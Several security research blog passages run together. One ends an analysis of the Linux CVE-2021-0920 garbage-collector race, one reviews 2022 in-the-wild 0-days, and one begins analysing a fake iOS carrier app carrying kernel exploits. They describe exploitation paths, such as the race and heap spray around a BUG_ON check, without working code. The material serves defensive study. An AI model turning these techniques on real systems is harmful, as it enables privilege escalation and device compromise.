Get skb = skb_peek(&sk->sk_receive_queue), skb is going to be freed by thread 0.
Stage2: for, calls __skb_unlink and kfree_skb later.
state->recv_actor(skb, skip, chunk, state)UAF
GC finished.
Start garbage collection.
Get f 10’’
Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle.
Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f 11 as a garbage candidate. For this reason, the following next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.
In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.
Patch in 2021
Let’s check the official patchfor CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:
…
+ spin_lock(&unix_gc_lock);
+ spin_unlock(&unix_gc_lock);
…
The patch is confusing - it’s rare to see such lock usage in software development. Regardless, the MSG_PEEK flag now waits for the completion of the garbage collector, so the UAF issue is resolved.
BUG_ON Added in 2017
Andrey Ulanov from Google in 2017 found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:
At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage, it can waive the BUG_ON check by heap spray.
To recap, we have discussed the kernel internals of SCM_RIGHTS and the designs and implementations of the Linux kernel garbage collector. Besides, we have analyzed the behavior of MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF by a subtle and arcane race condition.
The bug was spotted in 2016 publicly, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actors who saw the public email thread may have a chance to develop an LPE exploit against the Linux kernel.
In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.
This blog post is an overview of a talk, “ 0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available here.
For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the 2021 Year in Review report, which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the 2020 year-in-review report were very similar.
Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn’t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the slides from the talk.
When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.
This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:
Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.
Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.
Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:
Root cause analysis
Understanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.
Variant analysis
Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.
Patch analysis
Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.
Exploit technique analysis
Understanding the primitive gained from the vulnerability and how it’s being used. While it’s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn’t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.
Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at this repository. We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.
NOTE: This issue was CVE-2021-30983 was fixed in iOS 15.2 in December 2021.
Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:
App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodadone app)
Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.
This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.
The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.
Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.
Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.
This blog post is the story of the last exploit and the month-long journey to understand it.
Something's missing? Or am I missing something?
Although all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.
The sixth exploit didn't have anything like that.
Perhaps it could be triggering a kernel logic bug like Linuz Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.
It contained log messages like:
printf("Failed to prepare fake vtable: 0x%08x", ret);
which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.
Shortly after that was this log message:
printf("Waiting for R/W primitives...");
Why would you need to wait?
Then shortly after that:
printf("Memory read/write and callfunc primitives ready!");
Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:
printf("Unexpected data read from DCP: 0x%08x", v49);
DCP?
In October 2021 Adam Donenfeld tweeted this:
DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.
There's little public information about the DCP; the most comprehensive comes from the Asahi linux project which is porting linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:
On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!
The Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.
Setting the stage
Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?
Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:
M1 die-shot from techinsights.com with possible location of DCP added
Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.
With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.
My kingdom for a .dSYM!
The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:
Firmware/dcp/iphone13dcp.im4p
The im4p in this case is just a 25 byte header which we can discard:
It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:
$ nm -a iphone13dcp
iphone13dcp: no symbols
Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.
Since the firmware images are distributed as .zip files and Apple's servers support range requests with a bit of python and the partialzip tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.
That cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.
With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:
The cross-references to those strings look like this: